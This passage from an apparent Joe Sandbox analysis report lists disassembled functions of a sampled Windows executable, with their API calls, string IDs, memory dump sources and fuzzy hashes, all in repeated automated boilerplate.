                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                            • String ID: crts
                                                            • API String ID: 943502515-3724388283
                                                            • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                            • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                            Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                            • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                            • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                            • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                            Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$LabelVolume
                                                            • String ID: \VH
                                                            • API String ID: 2006950084-234962358
                                                            • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                            • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                            • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                            • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                            Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetMenuItemInfoW.USER32 ref: 00449727
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                            • DrawMenuBar.USER32 ref: 00449761
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                            • String ID: 0
                                                            • API String ID: 772068139-4108050209
                                                            • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                            • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                            • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                            • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                            Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcscpy
                                                            • String ID: 3, 3, 8, 1
                                                            • API String ID: 3469035223-357260408
                                                            • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                            • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                            • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                            • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                            Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                            • API String ID: 2574300362-3530519716
                                                            • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                            • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                            • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                            • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                            Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                            • API String ID: 2574300362-275556492
                                                            • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                            • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                            • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                            • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                            Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                            • API String ID: 2574300362-58917771
                                                            • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                            • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                            • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                            • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                            Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                            • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                            • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                            • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                            Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                            • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                            • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                            • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                            Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                            • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                            • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                            • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                            Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0047950F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                            • VariantClear.OLEAUT32(?), ref: 00479650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                            • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                            Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                            • __itow.LIBCMT ref: 004699CD
                                                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                            • __itow.LIBCMT ref: 00469A97
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                            • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                            Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                            • ScreenToClient.USER32(?,?), ref: 00449A80
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                            Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                            • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
